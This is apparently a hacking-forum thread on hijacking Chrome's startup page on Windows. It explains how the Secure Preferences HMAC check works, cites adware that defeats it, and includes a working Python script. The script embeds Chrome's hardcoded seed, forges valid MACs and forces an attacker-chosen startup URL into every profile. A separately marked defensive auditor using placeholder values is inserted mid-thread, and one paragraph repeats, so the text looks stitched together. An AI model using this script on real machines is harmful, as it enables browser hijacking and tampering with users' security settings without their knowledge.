
Script for replacing the browser's start page

Since you don't specify an operating system or browser combination you'd like to target, I'll assume the default scenario of attacking Chrome on Windows 10. This assumption is unfortunate because some alternative combos, for example, Firefox on Linux, make this as easy as changing a line in a config file.

It used to be the case that things were so simple on Windows as well - just switch a setting in C:\Users\YOUR USER\AppData\Local\Google\Chrome\User Data\Default\Preferences and voilà, we've programmatically set our new startup page URL! Things are no longer quite so easy. You will also read some PowerShell scripts online which do this via the registry. That also will not work (unless you are configuring GPO and the machine is hooked up to an AD domain and all that, but that is a separate scenario that I doubt describes you, so we'll assume that doesn't apply here. The point is, running those scripts on a normal machine will be of no use).

So what is the problem? In order to prevent malware from manipulating preferences maliciously and only allow the browser itself to make these changes to the relevant config files, all preferences deemed important for security are stored in the new Secure Preferences file (in the same directory as the Preferences file mentioned before) along with a custom HMAC SHA256 algo based hash of the setting signed with the browser's private key. At startup, Chrome then verifies all the hashes and if something doesn't match it asks for a restore.

Of course, we can get the secret key ourselves, reverse engineer Chromium's open source HMAC based algo, and so on, so that we can implement a real hash. In fact, a great blog post from a whitehat explaining how to do this can be found here: https://www.adlice.com/google-chrome-secure-preferences/

As that blog post mentions, there is already malware in the wild that does exactly this, such as Trotux/Elex. Another example, not mentioned in the post, is BrowserEnhancer. But there are zillions more; for the adware crowd this is a basic tactic.

Another way adware can accomplish this is by editing the source code of the browser itself to simply not perform the HMAC integrity check. According to the whitehat at https://www.microsoft.com/security/...nto-search-results-affects-multiple-browsers/:

In the past, browser modifiers calculated the hashes like browsers do and updated the Secure Preferences accordingly. Adrozek goes one step further and patches the function that launches the integrity check. The two-byte patch nullifies the integrity check, which makes the browser potentially more vulnerable to hijacking or tampering.

Haha, glorious! I haven't tried this, maybe it doesn't actually work now (although something very similar should with some updates). But the HMAC method definitely still works. Here's a paper explaining exactly how to do it: https://www.cse.chalmers.se/~andrei/cans20.pdf

And the code to calculate the HMAC seed, from the paper: https://github.com/Pica4x6/SecurePreferencesFile/blob/main/windows.py

The point is: this isn't super trivial for two reasons: 1) the adware people don't want to share hard work for free with their competition and 2) the white hats don't want to be too helpful to the adware folks.

I'd be happy to implement an open-source solution that does this if there's enough interest :)

Oh, and sorry I don't speak Russian. I know, I know, it's a Russian forum and I need to learn. But the English forums are all complete trash in comparison to the wondrous runet. So please forgive me. Besides, nationality is a bourgeois fiction!
 
Hi everyone!

Fellow foreigner here, just chiming in that I was able to turn the research done by severaltoes into a quick script that does what OP wants. Caveat - this script only works against Chrome on Windows. It's easy to port to Mac, or other Chromium based browsers, though.


Python:
STARTUP_URL = 'https://xss.pro'

import subprocess, getpass, os, json, hmac, hashlib

system_user = getpass.getuser()
chrome_data_dir = f'C:\\Users\\{system_user}\\AppData\\Local\\Google\\Chrome\\User Data'
chrome_profiles = [p for p in os.listdir(chrome_data_dir) if p.startswith('Profile ') or p == 'Default']
sid_cmd = f"wmic useraccount where name='{system_user}' get sid"
sid_cmd_output = subprocess.check_output(sid_cmd.split())
sid = sid_cmd_output.strip().split()[-1][:-5].decode()
seed = b'\xe7H\xf36\xd8^\xa5\xf9\xdc\xdf%\xd8\xf3G\xa6[L\xdffv\x00\xf0-\xf6rJ*\xf1\x8a!-&\xb7\x88\xa2P\x86\x91\x0c\xf3\xa9\x03\x13ihq\xf3\xdc\x05\x8270\xc9\x1d\xf8\xba\\O\xd9\xc8\x84\xb5\x05\xa8'

for profile in chrome_profiles:
    secure_preferences_path = f'{chrome_data_dir}\\{profile}\\Secure Preferences'

    with open(secure_preferences_path, 'r', encoding='utf8') as secure_preferences_file:
        data = json.load(secure_preferences_file)
        corrected_data = {'restore_on_startup' : 4, 'startup_urls' : [STARTUP_URL]}

        if 'session' not in data:
            data['session'] = {}

        for k, v in corrected_data.items():
            data['session'][k] = v

            message = sid + f'session.{k}' + json.dumps(v, separators=(',', ':'), ensure_ascii=False)
            hmac_hash = hmac.new(seed, message.encode("utf-8"), hashlib.sha256).hexdigest().upper()
            data['protection']['macs']['session'][k] = hmac_hash

    json.dump(data, open(secure_preferences_path, 'w'))

The reason the above script only attacks Chrome (and not, say, Brave or Edge) is because Chrome's seed is stable across systems and hardcoded, whereas other Chromium based browsers dynamically generate seeds. But calculating the seed yourself, or acquiring it from the installed browser on the system, is super easy.

The above script is a good start, though.
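A defender-side counterpart to the script above, added here and not part of the thread: it audits the session block of a Secure Preferences file using the same MAC construction the script uses (SID + pref path + compact JSON under HMAC-SHA256, upper-case hex) and shows why MAC verification alone is not enough, since an editor that knows the seed produces valid MACs. The seed, SID and allow-listed URL are constructed placeholders, not Chrome's real values.

```python
import hashlib
import hmac
import json

# Constructed demo values (not Chrome's real seed and not a real machine SID).
DEMO_SEED = bytes(range(64))
DEMO_SID = "S-1-5-21-1111111111-2222222222-3333333333-1001"
EXPECTED_STARTUP_URLS = {"https://intranet.example.local/"}


def compute_mac(seed: bytes, sid: str, path: str, value) -> str:
    """Recompute a Secure Preferences MAC the way the thread's script does:
    HMAC-SHA256(seed, sid + pref path + compact JSON of the value), upper hex."""
    message = sid + path + json.dumps(value, separators=(",", ":"), ensure_ascii=False)
    return hmac.new(seed, message.encode("utf-8"), hashlib.sha256).hexdigest().upper()


def audit_session_prefs(prefs: dict, seed: bytes, sid: str, allowed_urls=EXPECTED_STARTUP_URLS) -> list:
    """Return findings for the 'session' block of a parsed Secure Preferences dict.

    Two independent checks, because they catch different actors:
      - MAC verification catches edits made without the seed (a text editor,
        a naive script); Chrome itself would reset these on start;
      - the startup-URL allow-list catches edits made WITH the seed, which
        carry perfectly valid MACs (the adware case the thread describes).
    """
    findings = []
    session = prefs.get("session", {})
    macs = prefs.get("protection", {}).get("macs", {}).get("session", {})
    for key, value in session.items():
        stored = macs.get(key)
        expected = compute_mac(seed, sid, f"session.{key}", value)
        if stored is None:
            findings.append(f"session.{key}: no MAC stored")
        elif not hmac.compare_digest(stored, expected):
            findings.append(f"session.{key}: MAC mismatch, edited without the seed")
    if session.get("restore_on_startup") == 4:  # 4 = open a specific set of pages
        for url in session.get("startup_urls", []):
            if url not in allowed_urls:
                findings.append(f"startup_urls: {url} is not on the allow-list")
    return findings


def make_demo_prefs(startup_urls, seed=DEMO_SEED, sid=DEMO_SID, tamper=False) -> dict:
    """Build a constructed Secure Preferences dict with consistent MACs.
    With tamper=True the startup_urls value is changed after the MACs were made."""
    session = {"restore_on_startup": 4, "startup_urls": list(startup_urls)}
    macs = {k: compute_mac(seed, sid, f"session.{k}", v) for k, v in session.items()}
    if tamper:
        session["startup_urls"] = ["https://tampered.example/"]
    return {"session": session, "protection": {"macs": {"session": macs}}}
```

On a real profile, load the file with json.load and pass the machine SID and the browser's seed; a clean result from the MAC check with an unexpected URL is the signature of a seed-aware hijacker rather than a careless edit.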

Oh, and sorry I don't speak Russian. I know, I know, it's a Russian forum and I need to learn. But the English forums are all complete trash in comparison to the wondrous runet. So please forgive me. Besides, nationality is a bourgeois fiction!

Sigh. I'm learning Russian, too. Slowly, haha. Such a marvelous culture, history, language, and of course the best hackers in the world. Really great people. Although I do worry about being an annoyance, since I'm posting on a Russian forum in a foreign language.

I think that since we are, so to speak, linguistic guests, the burden is on us to be helpful and courteous. This is not our home, and we were not asked to come. Nevertheless, that doesn't mean we can't contribute and have a positive presence in the community. After all, we're all here to learn :)